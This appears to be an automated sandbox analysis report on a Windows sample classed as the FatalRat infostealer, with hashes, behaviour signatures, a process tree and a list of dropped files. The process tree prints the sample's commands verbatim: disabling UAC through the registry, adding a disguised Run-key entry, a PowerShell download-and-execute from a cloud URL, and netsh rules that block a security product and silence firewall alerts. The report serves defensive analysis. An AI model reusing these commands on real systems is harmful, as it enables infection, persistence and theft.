Analysis

  • max time kernel
    141s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20250217-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    23/02/2025, 12:41

General

  • Target
    2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe
  • Size
    20.0MB
  • MD5
    f999f60afb55137a3c068a707a421a5f
  • SHA1
    15f5a8d7930cef9479caf9ecc2dd2c2d8f1efb32
  • SHA256
    b17337db64b6ab60e969cec89c36058baf5e100c25684bda9beb0afa1c342b4d
  • SHA512
    24a7ffcec017937eec514a2bf2d1d36632abb829ece9fe59c63decb4c07e52f3a0ae8d09c8e7f61fa0f7fa1ecef5fdae8702ab48a09266391969fb71b85fbe4c
  • SSDEEP
    196608:patpgF2oM7Vk96Cy8xEqn0SweKG8UvMGnsOTMk:otpgF2oM7Vk96Cy8xEqn0MlDvtnsO4

Malware Config

Extracted

  • Language
    ps1
  • Deobfuscated URLs
    exe.dropper: https://baba-1336130708.cos.ap-tokyo.myqcloud.com/tsetup-x64.5.11.1.exe

Signatures

  • FatalRat

    FatalRat is a modular infostealer family written in C++, first appearing in June 2021.

  • Fatalrat family
  • UAC bypass 3 TTPs 1 IoCs
  • Fatal Rat payload 1 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Downloads MZ/PE file 1 IoCs
  • Modifies Windows Firewall 2 TTPs 8 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Drops desktop.ini file(s) 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 24 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Modifies registry class 33 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 5 IoCs
  • Suspicious use of SendNotifyMessage 4 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 41 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe
    "C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe"
    1⤵
    • Checks computer location settings
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:396
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Downloads\20250223024202\1.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4412
      • C:\Windows\system32\reg.exe
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
        3⤵
        • UAC bypass
        PID:2056
    • C:\programdata\20250223024202\Agghosts.exe
      "C:\programdata\20250223024202\Agghosts.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Checks processor information in registry
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:5056
    • C:\Windows\System32\reg.exe
      "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v GoogleUpdata_Service /d "C:\programdata\lnk\dick.lnk" /f
      2⤵
      • Adds Run key to start application
      PID:5048
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Videos\download_and_run.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1500
      • C:\Windows\system32\chcp.com
        chcp 65001
        3⤵
        PID:2928
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://baba-1336130708.cos.ap-tokyo.myqcloud.com/tsetup-x64.5.11.1.exe', 'C:\Users\Public\Videos\bin.exe')"
          3⤵
          • Blocklisted process makes network request
          • Downloads MZ/PE file
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1580
        • C:\Users\Public\Videos\bin.exe
          "C:\Users\Public\Videos\bin.exe"
          3⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:4084
          • C:\Users\Admin\AppData\Local\Temp\is-DUQG5.tmp\bin.tmp
            "C:\Users\Admin\AppData\Local\Temp\is-DUQG5.tmp\bin.tmp" /SL5="$1301F8,46193823,827904,C:\Users\Public\Videos\bin.exe"
            4⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of WriteProcessMemory
            PID:1712
            • C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe
              "C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe"
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Drops desktop.ini file(s)
              • Enumerates system info in registry
              • Modifies registry class
              • Suspicious behavior: AddClipboardFormatListener
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              • Suspicious use of SetWindowsHookEx
              PID:1920
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Downloads\20250223024202\fhq.bat" "
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2524
        • C:\Windows\system32\netsh.exe
          netsh advfirewall firewall add rule name="Block Program Network Access" dir=in action=block program="" enable=yes
          3⤵
          • Modifies Windows Firewall
          • Event Triggered Execution: Netsh Helper DLL
          PID:4544
        • C:\Windows\system32\netsh.exe
          netsh advfirewall firewall add rule name="Block Program Network Access" dir=out action=block program="" enable=yes
          3⤵
          • Modifies Windows Firewall
          • Event Triggered Execution: Netsh Helper DLL
          PID:4556
        • C:\Windows\system32\netsh.exe
          netsh advfirewall firewall add rule name="Block Program Network Access2" dir=in action=block program="safemon\360tray.exe=360Safe.exe" enable=yes
          3⤵
          • Modifies Windows Firewall
          • Event Triggered Execution: Netsh Helper DLL
          PID:4832
        • C:\Windows\system32\netsh.exe
          netsh advfirewall firewall add rule name="Block Program Network Access2" dir=out action=block program="safemon\360tray.exe=360Safe.exe" enable=yes
          3⤵
          • Modifies Windows Firewall
          • Event Triggered Execution: Netsh Helper DLL
          PID:3936
        • C:\Windows\system32\netsh.exe
          netsh advfirewall set allprofiles state on
          3⤵
          • Modifies Windows Firewall
          • Event Triggered Execution: Netsh Helper DLL
          PID:3316
        • C:\Windows\system32\netsh.exe
          netsh advfirewall set privateprofile settings inboundusernotification disable
          3⤵
          • Modifies Windows Firewall
          • Event Triggered Execution: Netsh Helper DLL
          PID:2792
        • C:\Windows\system32\netsh.exe
          netsh advfirewall set publicprofile settings inboundusernotification disable
          3⤵
          • Modifies Windows Firewall
          • Event Triggered Execution: Netsh Helper DLL
          PID:3968
        • C:\Windows\system32\netsh.exe
          netsh advfirewall set domainprofile settings inboundusernotification disable
          3⤵
          • Modifies Windows Firewall
          • Event Triggered Execution: Netsh Helper DLL
          PID:2380

Downloads

  • C:\ProgramData\20250223024202\Agghosts.exe
    Filesize 2.7MB
    MD5 2a24dcd41bc3c5b5f7eceda525786578
    SHA1 7e898f9ee5a97a1a261326f0168e8de44dcf8af4
    SHA256 169e9e4b23878035551455f4e5dbd01ece204e59fe75361680e8786998059ca7
    SHA512 aaded4c72d3fa77eefd9d4b098288dd6923bd79813466d93313d6acb00fea9bb90248fff92cc89a625c60ae3b7cc1c27e8bb178fdac624ec896267da57b9fd6a
  • C:\ProgramData\lnk\2.lnk
    Filesize 1KB
    MD5 97dd1e75e3378d3e5f4cb676787df4c5
    SHA1 9050ff87b70c2d534c1218113a3f5e3d971b4d90
    SHA256 fc567936880543449bfc3c148219e3332db05554a2bfee030cade8f0ecc6b4ee
    SHA512 acf35d67939ff0281e66b1b281197a815eb932b79c18d121ec68a366509fd3aade0bde257ba0d22e9396b172d2a6915cc000a2e961fa701e9586b09d46e17655
  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_h1zfqu1i.rz5.ps1
    Filesize 60B
    MD5 d17fe0a3f47be24a6453e9ef58c94641
    SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
    SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
    SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
  • C:\Users\Admin\AppData\Local\Temp\is-DUQG5.tmp\bin.tmp
    Filesize 3.2MB
    MD5 2e90747fe82d7271fbe97ea022fd5173
    SHA1 6164bc0ec0c908e9159a0c5d558945d7974e11c1
    SHA256 bbec6b26c13b8ebfd01789a8248c6a45646134daf1ef998dbb885ec59157e6b4
    SHA512 d9a797861f8a7fc966a0a00e1719734a23c95c39aca9d70322d09274119267c8bd0d86a3ec468a7f493422769f89a48469f1e33a6a1dd2d39cb30cfb4df6fa44
  • C:\Users\Admin\AppData\Roaming\Telegram Desktop\modules\x64\d3d\d3dcompiler_47.dll
    Filesize 4.7MB
    MD5 a7349236212b0e5cec2978f2cfa49a1a
    SHA1 5abb08949162fd1985b89ffad40aaf5fc769017e
    SHA256 a05d04a270f68c8c6d6ea2d23bebf8cd1d5453b26b5442fa54965f90f1c62082
    SHA512 c7ff4f9146fefedc199360aa04236294349c881b3865ebc58c5646ad6b3f83fca309de1173f5ebf823a14ba65e5ada77b46f20286d1ea62c37e17adbc9a82d02
  • C:\Users\Public\Downloads\20250223024202\1.bat
    Filesize 229B
    MD5 fa42ebb1071abc0e618c296ea2cf71a6
    SHA1 9e0c0737b0e37b3e821d011eecd9b0c7c9f2a15a
    SHA256 395f835731d25803a791db984062dd5cfdcade6f95cc5d0f68d359af32f6258d
    SHA512 0ed9919675c224201996caeeecf625a1db00a70af5d3ba135dc3d6fa16bfcc562426c813e21b4e861f04d312635be3528d79b5c49b23e78161f2b051fa9aaf05
  • C:\Users\Public\Downloads\20250223024202\fhq.bat
    Filesize 1KB
    MD5 3a7cb580bd340505f6dc5b4c829a3eca
    SHA1 21cc730517d74fa1d13316d7e0d817f3bd710906
    SHA256 1c1528b546aa29be6614707cbe408cb4b46e8ed05bf3fe6b388b9f22a4ee37e2
    SHA512 c224fa676542b90f8fc990e574028af664dced61612855290fb23ce4acad2d6b9043e901365939106b591b6746b3e4ddada15eede88a947051e9d8083194e630
  • C:\Users\Public\Videos\bin.exe
    Filesize 45.0MB
    MD5 06eaa3263801f4d695c3727834ffbca5
    SHA1 58031db0039cf00a1fe738e55ee2fca35558c4fd
    SHA256 97969d6e01ee37a16f4f7f64e6166f169bedfe95190f48d426693d4b95e8e8ff
    SHA512 7b03899c6ce403172eb6d159e142b8ac25ef3aa6eb7f56abd205657d13832eb5b8ee61408b8d7a6f3f1c57de7fcc2565ce2ce9ecb4e54611f4c48098a870b6b3
  • C:\Users\Public\Videos\download_and_run.bat
    Filesize 415B
    MD5 a90ccfd040d774b547f7d258b8e03661
    SHA1 c46e353d34723f9393482974a516d51dfb52440d
    SHA256 d852cfc4107e9ce5bec7349ef180366bbb4fe0878e725325a2b844f93a1ac1e2
    SHA512 bdc816781c44b6e9bbc8207a3c0466a45397cf7815f267add21abe243bf138b5bae7ffec867433bf249e139b726413f68b7002f541c89ae1a25bd1e6980abfd7
  • C:\programdata\20250223024202\Ensup.log
    Filesize 192KB
    MD5 2fd94f6e1d71454d716a126f0d7450ac
    SHA1 5d966df95c741880089e9078af921a22216516ec
    SHA256 a599cbb05b69328655a7a0afc2644ed607c30a05edfb8fd6be2ea920c25b54b5
    SHA512 340107b69fc49b8fe1acf37a3a6e40c4b7206cf3ae069fea6f4ba702a733401e1feef55e1d858b3529764bcd0ba371ef552f5838444b65b62545e1da150f9bb2
  • C:\programdata\20250223024202\libcef.dll
    Filesize 1.9MB
    MD5 b7f8c3416cdfd6f46c790da064f66099
    SHA1 d7ae9a3d49bbf1981e7d6604128e18b6cd160bd6
    SHA256 b9edf03447cf402e24da384c146c9d1536871a47518c795c4aea6550e3abd94d
    SHA512 24272954e57f4f4f81dad90469e84946549e3441ba599f8b819d069b803687b3da35f449c0f18755352dba208d6d63af1d6b53c0a56adbd36540b1537bb99dc7